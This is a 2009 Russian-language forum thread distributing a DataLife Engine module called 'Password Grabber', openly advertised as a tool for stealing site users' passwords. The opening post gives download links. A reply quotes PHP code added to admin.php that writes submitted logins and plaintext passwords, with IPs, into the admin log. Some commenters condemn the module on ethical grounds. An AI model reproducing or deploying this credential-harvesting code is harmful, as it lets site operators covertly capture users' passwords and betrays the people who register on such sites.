Модуль DLE Password Graber 2.0

Тема в разделе "DLE", создана пользователем Хортица, 11 янв 2009.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 10.0 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Хортица

    Хортица Прохожие


    [​IMG]


    [​IMG]

    [​IMG]


    Арторское право : ZLoY
    Ася: 561703
    Сайт: _http://zloy.net.ua/
    Модуль предназначен для угона паролей у юзеров.
    Модуль распрастраняется платно! Цена 30 WMZ | 0$

    От себя: самый подлый модуль который можно придумать на ДЛЕ:-]
    Отдельное спасибо людям с dle.in.ua и анониму :nezn:


    http://rapidshare.com/files/181884063/dle_password_grabber_v_1.7_final.rar
    http://depositfiles.com/files/ry52naxtn
    http://upload.com.ua/get/900639658/


    Версия 2.0
     
  2. Imperial

    Imperial Читатель

    Заблокирован
    Регистр.:
    6 июл 2007
    Сообщения:
    25
    Симпатии:
    0
    т.е. оно в админку выводит пароли пользователей?
     
  3. Хортица

    Хортица Прохожие

    Да, но только новозареганных, ибо старые уже зашифрованы md5
     
  4. Imperial

    Imperial Читатель

    Заблокирован
    Регистр.:
    6 июл 2007
    Сообщения:
    25
    Симпатии:
    0
    жесть.. расстрелять автора мало..)
    Вот почему на варезниках нужно использовать тупые пароли..)
     
  5. trojan.exe

    trojan.exe Постоялец

    Регистр.:
    11 июл 2007
    Сообщения:
    89
    Симпатии:
    7
    А что это за кусок кода такой подозрительный???

    Код:
    Открыть: admin.php
    
    ищем:
    require_once (ENGINE_DIR.'/inc/init.php');
    
     
    
    ниже вставляем:
    
    if (trim($_POST['login_name']) and trim($_POST['login_password']) and $is_logged == TRUE) addlog($lang_log['sloginfalse'].' Логин: '.$_POST['login_name'].', Пароль: '.$_REQUEST['login_password'].', IP: <a target="_blank" href="http://whois.myws.ru/d/'.$_SERVER['REMOTE_ADDR'].'">'.$_SERVER['REMOTE_ADDR'].'</a>');
     
  6. Imperial

    Imperial Читатель

    Заблокирован
    Регистр.:
    6 июл 2007
    Сообщения:
    25
    Симпатии:
    0
    И что в нём подозрительного?
     
  7. trojan.exe

    trojan.exe Постоялец

    Регистр.:
    11 июл 2007
    Сообщения:
    89
    Симпатии:
    7
    Внимательнее посмотри! В коде присутствует ссылка на какойто левый сайт : "Дмитрий БайбековМои проекты" Нафиг он там нужен? Если это проверка хуиз, то в печь ее, луче на nicdotru перевести, а если это чото круче? я просто не знаю что сие означает..
     
  8. Хортица

    Хортица Прохожие

    Это просто код, для вывода ссылки проверки whois IP
     
  9. bukа

    bukа Писатель

    Заблокирован
    Регистр.:
    23 окт 2008
    Сообщения:
    446
    Симпатии:
    138
    Да здраствует хаос. Хотя я например так спамеров мочил бы
     
  10. dm_mb

    dm_mb

    Регистр.:
    6 июн 2006
    Сообщения:
    610
    Симпатии:
    122
    я бы подумал над этичным аспектом выкладывания в паблик такого модуля.

    смотреть пароли юзеров, читать их Пм. что следующее? имхо бред малолетнего школьника а не модуль. теперь как истинный параноик буду бояццо регаться на ДЛЕшных сайтах :)
     
Статус темы:
Закрыта.